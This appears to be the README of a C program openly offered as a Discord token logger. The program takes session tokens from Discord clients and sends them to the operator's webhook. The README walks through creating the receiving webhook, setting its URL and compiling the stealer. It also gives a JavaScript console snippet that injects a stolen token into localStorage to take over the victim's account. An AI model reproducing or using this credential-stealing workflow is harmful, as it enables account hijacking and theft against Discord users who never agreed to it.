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Simple Discord Token Logger in C Support Server

Logs tokens from discord, discord canary, ptb, etc



  • Edit the webhook url in config.h which is in the config folder to your own webhook url.
  • You may also add paths to other discord clients in config.c in the same folder.
  • To compile with Microsoft Visual Studio, you will need meson and ninja.
  • To compile with tcc, which I have included in the repo, for your convenience, you only need to run build.bat.

How to get a webhook url

  • Go to the channel you want to send the tokens to.
  • Click on the settings icon next to the channel name.
  • Click on the integrations tab.
  • Click on webhooks.
  • Click on new webhook.
  • Give it a name and a profile picture if you want.
  • Copy the webhook url and paste the part /api/webhooks/1234/example.. in the config.h file.

How to login to discord accounts via token

  • Go to
  • Open the developer tools by pressing F12.
  • Go to the console tab.
  • Paste the following code in the console tab and press enter.
let token = "your token";

function login(token) {
    setInterval(() => {
      document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
    }, 50);
    setTimeout(() => {
    }, 2500);


You can also use the Discord Token Login Chrome Extention to login to discord accounts via token.

Building with the provided gui builder:

  • The gui builder is a simple gui that take care of the compiling process for you.
  • You will not need to install a compiler or any other dependencies.
  • You can download the gui builder from releases.
  • The GUI will only requires you to enter the webhook url. No need to edit the config.h file or anything else.


Building with Microsoft Visual Studio:


Visual Studio 2019
  • From the start menu, search for "x64 Native Tools Command Prompt for VS 2019" and open it.
  • cd into to the directory where you cloned the repo.
  • Run the following commands:
meson wrap install openssl
meson setup build 
cd build
  • The executable will be in the build folder.

Building with tcc:

Requirements: None

  • Run build.bat
  • The executable will be in the bin folder which will be opened automatically after the build process is done.